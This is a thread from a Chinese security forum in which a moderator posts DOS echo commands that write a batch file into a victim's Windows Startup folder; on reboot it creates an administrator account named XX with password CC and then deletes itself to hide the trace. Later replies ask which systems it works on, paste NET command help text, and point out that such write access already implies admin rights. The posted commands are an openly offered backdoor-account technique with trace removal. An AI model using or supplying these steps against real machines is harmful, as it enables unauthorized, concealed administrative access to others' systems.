|
作者: yangze [yangze] 版主 | 登录 |
Echo在dos命令中是写入类型的命令,格式如下: Echo net user(你要写入的字符) > c:\XX.CC(你要写入的文件) 如果你在对方的机子中有写的权限的话,那么我们可以在C:\ Documents and Settings\administrators\「开始」菜单\程序\启动 菜单下建立一个bat文件来添加一个admin用户。 请看: echo net user XX CC /add > C:\ Documents and Settings\administrators\「开始」菜单\程序\启动\CC.bat (建立一个名为XX,密码CC的用户) echo net localgroup administrators XX /add >> C:\Documents and Settings\administrators \[开始]菜单\程序\启动\CC.bat (将XX这个用户加入管理员组) echo del C:\Documents and Settings\administrators\[开始]菜单\程序\启动\CC.bat >> C:\Documents and Settings\administrators\[开始]菜单\程序\启动\CC.bat (删除足迹) 等对方重启之后.,服务器上就有了一个名为:XX 密码:CC的管理员了。 |
地主 发表时间: 05/07 18:08 |
回复: stone [stone] 论坛用户 | 登录 |
是挺有意思!但是没有太大的应用意义啊!(我觉得啊 ) |
B1层 发表时间: 05/07 20:59 |
回复: yangze [yangze] 版主 | 登录 |
熟悉一下有好处,不是很多.虽然这些东西用其它的方法都可实现. |
B2层 发表时间: 05/07 21:21 |
回复: xiaohu0122 [xiaohu0122] 论坛用户 | 登录 |
适用于哪些操作系统?! |
B3层 发表时间: 05/10 22:41 |
回复: top [top] 论坛用户 | 登录 |
LINUX的吧? 没有ECHO 就可以在2000里用!是不是啊? |
B4层 发表时间: 05/10 22:56 |
回复: yangze [yangze] 版主 | 登录 |
不是说了在DOS中用吗? |
B5层 发表时间: 05/11 14:09 |
回复: vishx [vishx] 论坛用户 | 登录 |
请问DOS的命令在哪找???? |
B6层 发表时间: 05/11 14:22 |
回复: ghlhappy [ghlhappy] 论坛用户 | 登录 |
对啊,我和楼上的兄弟一个想法,有谁知道哪里有在DOS下的网络命令啊? |
B7层 发表时间: 05/11 16:58 |
回复: sunshine [bysx] 论坛用户 | 登录 |
net -help. 慢慢看吧. |
B8层 发表时间: 05/11 18:40 |
回复: xiaohu0122 [xiaohu0122] 论坛用户 | 登录 |
display diagnostic information about your network. NET HELP Provides information about commands and error messages. NET INIT Loads protocol and network-adapter drivers without binding them to Protocol Manager. NET LOGOFF Breaks the connection between your computer and the shared resources to which it is connected. NET LOGON Identifies you as a member of a workgroup. NET PASSWORD Changes your logon password. NET PRINT Displays information about print queues and controls print jobs. NET START Starts services. NET STOP Stops services. NET TIME Displays the time on or synchronizes your computer's clock with the clock on a Microsoft Windows for Workgroups, Windows NT, Windows 95, or NetWare time server. NET USE Connects to or disconnects from a shared resource or displays information about connections. NET VER Displays the type and version number of the workgroup redirector you are using. NET VIEW Displays a list of computers that share resources or a list of shared resources on a specific computer. 这些看不懂啊! |
B9层 发表时间: 05/12 18:26 |
回复: rock [rock_zl] 论坛用户 | 登录 |
呵呵,你在2000中既然能访问c:\Documents and Settings\Administrator文件夹,那你还有必要去添加具有管理员权限的用户??? |
B10层 发表时间: 05/12 23:26 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号